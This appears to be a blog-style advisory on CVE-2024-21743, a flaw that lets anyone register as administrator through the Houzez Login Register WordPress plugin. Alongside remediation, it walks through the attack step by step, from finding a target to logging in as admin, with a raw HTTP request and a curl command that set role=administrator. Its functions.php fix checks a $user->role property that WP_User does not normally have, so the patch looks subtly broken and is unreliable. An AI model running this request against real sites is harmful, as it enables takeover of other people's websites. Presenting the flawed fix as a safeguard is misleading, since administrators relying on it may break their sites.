CVE-2024-21743 - Privilege Escalation in Houzez Login Register Plugin (<= 3.2.5)

WordPress plugins are a big target for attackers because they can open doors to sites even when the WordPress core is up-to-date. In early 2024, a serious vulnerability (CVE-2024-21743) was discovered in the widely used Houzez Login Register plugin by Favethemes. This bug lets anyone increase their privileges—like turning an ordinary user into an admin—if the site is running any version up to *and including* 3.2.5.

In this article, we break down how the vulnerability works, provide code snippets, explain exploitation, and share how to protect your site.

What Is the Vulnerability (CVE-2024-21743)?

CVE-2024-21743 is a privilege escalation vulnerability in the Houzez Login Register plugin, all the way up through version 3.2.5 (there was no previous public version tracking, so everything before 3.2.5 is affected).

In plain English:
A regular user (or even an attacker who registers freely) can trick the site into giving themselves admin privileges, which can lead to a total site takeover.

How Does The Vulnerability Work?

The core issue is that the plugin does not properly check or restrict the role property when users register for an account.

Here’s some simplified PHP code, similar to what’s found in the affected plugin (based on public research):

// Vulnerable registration handler
if (isset($_POST['role'])) {
    $user_role = sanitize_text_field($_POST['role']);
} else {
    $user_role = 'subscriber';
}

$user_id = wp_create_user($username, $password, $email);
if ($user_id && !is_wp_error($user_id)) {
    $user = new WP_User($user_id);
    $user->set_role($user_role); // <-- The problem: No filtering!
}

What goes wrong?
The code above takes the role field straight from the registration form. Anyone can send a registration request like:

POST /wp-admin/admin-ajax.php?action=register HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded

username=hacker&password=Password123!&email=hacker@badguy.com&role=administrator

The plugin sets the account’s role *exactly as requested*—so now hacker@badguy.com is a WordPress admin!

1. Find a Target

Any WordPress site using Houzez Login Register <= 3.2.5 can be attacked if they allow account registration.

2. Register an Account with Admin Privileges

Send a POST request (as above) to create an account, but add the role=administrator parameter. Tools like Burp Suite, curl, or your browser's developer console can help.

curl Example

curl -X POST "https://victim-site.com/wp-admin/admin-ajax.php?action=register"; \
  -d "username=eviladmin&password=StrongPassword!&email=evil@hacker.com&role=administrator"

3. Log In

Go to the WordPress login page and sign in with your new credentials. If vulnerable, you now have full admin access!

Remediation and Fix

Upgrade immediately:
As soon as a patched version is available, update the Houzez Login Register plugin. (Check for new versions here)

Temporary Fix (For Developers/Admins):
Until you can upgrade, you can add code to your theme’s functions.php to block users from registering as anything but a safe role:

add_action('user_register', function($user_id) {
    $user = new WP_User($user_id);
    if (!in_array($user->role, ['subscriber', 'customer', 'contributor'])) {
        $user->set_role('subscriber');
    }
});

Extra Steps

- Disable user registration if you don't need it (Settings > General > Uncheck "Anyone can register").

References

- Original source plugin
- WPVulnDB entry
- NVD - CVE-2024-21743
- Wordfence Research: Houzez Login Register Privilege Escalation

Final Thoughts

CVE-2024-21743 once again proves that plugin security is just as important as core WordPress security. If you or your clients are using Houzez Login Register, take action now to secure your site. Always keep plugins up-to-date and keep an eye out for critical security advisories.

Timeline

Published on: 09/17/2024 14:15:16 UTC
Last modified on: 09/20/2024 12:30:51 UTC